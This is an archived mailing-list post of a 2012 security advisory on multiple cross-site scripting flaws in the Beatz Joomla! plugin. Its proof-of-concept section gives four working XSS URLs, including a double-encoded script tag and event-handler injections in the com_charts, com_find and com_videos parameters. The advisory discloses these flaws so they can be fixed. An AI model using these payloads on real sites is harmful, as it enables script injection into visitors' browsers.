Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) Source code repositories (CVSweb) File archive & mirrors How to verify digital signatures OVE IDs What's new

Message-ID: <CAPYM6Vxx-1nvBsVLqTZPsqDevfXkiR30-1H=+96ko0w4gGczLA@mail.gmail.com>
Date: Mon, 16 Apr 2012 00:39:16 +0800
From: YGN Ethical Hacker Group <lists@...g.net>
To: full-disclosure <full-disclosure@...ts.grok.org.uk>, bugtraq <bugtraq@...urityfocus.com>, 
	secalert@...urityreason.com, bugs@...uritytracker.com, 
	vuln <vuln@...unia.com>, vuln@...urity.nnov.ru, news@...uriteam.com, 
	moderators@...db.org, submissions@...ketstormsecurity.org, 
	submit@...ecurity.com, oss-security@...ts.openwall.com
Subject: Joomla! Plugin - Beatz 1.x <= Multiple Cross Site Scripting Vulnerabilities

1. OVERVIEW

Beatz 1.x versions are vulnerable to Cross Site Scripting.


2. BACKGROUND

Beatz is a set of powerful Social Networking Script Joomla! 1.5
plugins that allows you to start your own favourite artist band
website. Although it is just a Joomla! plugin, it comes with full
Joolma! bundle for ease of use and installation.


3. VULNERABILITY DESCRIPTION

Multiple parameters were not properly sanitized upon submission, which
allows attacker to conduct Cross Site Scripting attack. This may allow
an attacker to create a specially crafted URL that would execute
arbitrary script code in a victim's browser. The vulnerable plugins
include: com_find, com_charts and com_videos.


4. VERSIONS AFFECTED

Tested in 1.x versions


5. PROOF-OF-CONCEPT/EXPLOIT

== Generic Joomla! 1.5 Double Encoding XSS

http://localhost/beatz/?option=com_content&view=frontpage&limitstart=5&%2522%253e%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2f%2558%2553%2553%2f%2529%253c%2f%2573%2563%2572%2569%2570%2574%253e=1

== com_charts (parameter: do)

http://localhost/beatz/index.php?option=com_charts&view=charts&Itemid=76&chartkeyword=Acoustic&do=all%22%20style%3dbackground-image:url('javascript:alert(/XSS/)');width:1000px;height:1000px;display:block;"%20x=%22&option=com_charts

== com_find (parameter: keyword)

http://localhost/beatz/index.php?do=listAll&keyword=++Search"><img+src=0+onerror=prompt(/XSS/)>&option=com_find

== com_videos (parameter: video_keyword)

http://localhost/beatz/index.php?option=com_videos&view=videos&Itemid=59&video_keyword="+style="width:1000px;height:1000px;position:absolute;left:0;top:0"+onmouseover="alert(/xss/)&search=Search


6. SOLUTION

The vendor hasn't released the fixed yet.


7. VENDOR

Cogzidel Technologies Pvt Ltd.
http://www.cogzidel.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-03-01: notified vendor
2012-04-15: vulnerability disclosed


10. REFERENCES

Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bbeatz_1.x%5D_xss

#yehg [2012-04-15]

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.